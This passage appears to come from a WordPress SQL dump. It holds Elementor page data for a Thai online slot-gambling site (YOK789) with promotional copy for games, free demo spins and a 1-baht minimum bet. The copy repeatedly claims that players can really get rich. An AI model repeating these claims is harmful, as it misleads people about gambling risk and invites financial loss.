\\u0e21\\u0e32\\u0e43\\u0e19\\u0e18\\u0e35\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e22\\u0e18\\u0e23\\u0e23\\u0e21\\u0e25\\u0e36\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2a\\u0e35\\u0e17\\u0e2d\\u0e07\\u0e41\\u0e25\\u0e30\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e02\\u0e38\\u0e21\\u0e17\\u0e23\\u0e31\\u0e1e\\u0e22\\u0e4c \\u0e08\\u0e38\\u0e14\\u0e02\\u0e32\\u0e22\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e0b\\u0e48\\u0e2d\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e27\\u0e49\\u0e17\\u0e38\\u0e01\\u0e15\\u0e32 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07\\u0e21\\u0e35\\u0e1a\\u0e17\\u0e1a\\u0e32\\u0e17\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e49\\u0e19\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2b\\u0e31\\u0e27\\u0e43\\u0e08\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e23\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e2b\\u0e22\\u0e38\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e1a\\u0e32\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e2d\\u0e32\\u0e08\\u0e19\\u0e34\\u0e48\\u0e07\\u0e41\\u0e15\\u0e48\\u0e1e\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e27\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e43\\u0e08 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e23\\u0e48\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e19\\u0e30 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e01\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1d\\u0e37\\u0e19\\u0e43\\u0e08<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Dragon Hatc<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Dragon Hatch \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e22\\u0e34\\u0e1a\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e27\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e21\\u0e32\\u0e40\\u0e15\\u0e34\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e48\\u0e32\\u0e22\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e43\\u0e19\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e43\\u0e1a\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e32\\u0e14\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e17\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e44\\u0e1f\\u0e41\\u0e25\\u0e30\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07\\u0e04\\u0e33\\u0e23\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1b\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e19\\u0e31\\u0e01\\u0e25\\u0e48\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e37\\u0e48\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1e\\u0e35\\u0e04\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e1e\\u0e25\\u0e34\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e08\\u0e30\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e43\\u0e19\\u0e14\\u0e34\\u0e19\\u0e41\\u0e14\\u0e19\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e04\\u0e37\\u0e2d\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-2-.webp\",\"id\":288,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e1f\\u0e23\\u0e35 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e1f\\u0e23\\u0e35 YOK789 \\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e32\\u0e22\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e38\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e42\\u0e2b\\u0e21\\u0e14 <strong>\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e1f\\u0e23\\u0e35 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07<\\/strong><\\/span><span style=\\\"font-weight: 400;\\\">\\u00a0\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e15\\u0e34\\u0e21\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e1b\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c \\u0e08\\u0e30\\u0e25\\u0e2d\\u0e07\\u0e08\\u0e31\\u0e1a\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01 \\u0e14\\u0e39\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e17\\u0e2a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e40\\u0e01\\u0e21\\u0e44\\u0e2b\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e01\\u0e47\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e42\\u0e1b\\u0e23 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e32\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e47\\u0e40\\u0e14\\u0e34\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e09\\u0e35\\u0e22\\u0e1a\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e44\\u0e14\\u0e49\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e17\\u0e38\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e23\\u0e2d\\u0e1a\\u0e41\\u0e23\\u0e01 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e08\\u0e32\\u0e01\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2740,377,'_thumbnail_id','371'),(2741,377,'_elementor_edit_mode','builder'),(2742,377,'_elementor_template_type','wp-page'),(2743,377,'_elementor_version','3.35.5'),(2744,377,'_elementor_pro_version','3.32.3'),(2745,377,'_wp_page_template','default'),(2746,377,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2747,377,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-AMB18.webp\",\"id\":363,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-AMB18.webp\",\"id\":365,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"https:\\/\\/amb18b.com\\/\\\"><b>YOK789<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e04\\u0e37\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e27\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e2b\\u0e22\\u0e38\\u0e14\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e25\\u0e2d\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e1b\\u0e23\\u0e01\\u0e47\\u0e44\\u0e25\\u0e48\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e2a\\u0e1b\\u0e35\\u0e14 \\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e40\\u0e15\\u0e34\\u0e21\\u0e16\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27\\u0e17\\u0e31\\u0e19\\u0e43\\u0e08\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e21\\u0e35\\u0e04\\u0e48\\u0e32 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e36\\u0e01\\u0e04\\u0e31\\u0e01\\u0e1c\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e27\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 